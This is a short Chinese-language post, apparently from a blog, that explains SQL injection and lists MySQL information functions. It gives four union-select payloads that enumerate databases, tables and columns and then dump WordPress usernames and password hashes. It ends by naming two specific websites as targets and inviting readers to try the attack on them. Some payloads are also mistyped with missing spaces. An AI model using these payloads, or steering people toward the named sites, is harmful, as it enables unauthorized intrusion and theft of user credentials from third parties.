sql注入:
SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.
SQL注入的产生原因通常表现在以下几方面:
①不当的类型处理;
②不安全的数据库配置;
③不合理的查询集处理;
④不当的错误处理;
⑤转义字符处理不合适;
⑥多个提交处理不当。
PHP内置函数:
1:system_user() 系统用户名
2:user() 用户名
3:current_user 当前用户名
4:session_user()连接数据库的用户名
5:database() 数据库名
6:version() MYSQL数据库版本
7:load_file() MYSQL读取本地文件的函数
8:@@datadir 读取数据库路径
9:@@basedir MYSQL 安装路径
10:@@version_compile_os 操作系统
1,爆库
and 1=2 union select group_concat(SCHEMA_NAME)from
information_schema.SCHEMATA--
2,爆表
and 1=2 union select group_concat(TABLE_NAME)from information_schema.TABLES whereTABLE_SCHEMA=0x776f72647072657373--
3,爆字段
and 1=2 union select group_concat(COLUMN_NAME)from
information_schema.COLUMNSwhere TABLE_name=0x77705f7573657273--
4,爆密码
and 1=2 unionselect group_concat(user_login,0x7c,user_pass) from
wordpress.wp_users--
我的测试案例是:
案例:http://www.rxydpq.com/news_show.php?id=66
案例二: http://www.zhangshiyu.com.cn/www/news_show.php?id=572可以拿这两个网站试一下哦
由于我是测试一下 不能把具体的步骤发出来,嘻嘻,你们懂的,我可不想被定为窃取数据,哈哈哈,前面的4个步骤就可以得到网站的数据库信息,大家可以互相交流哦!!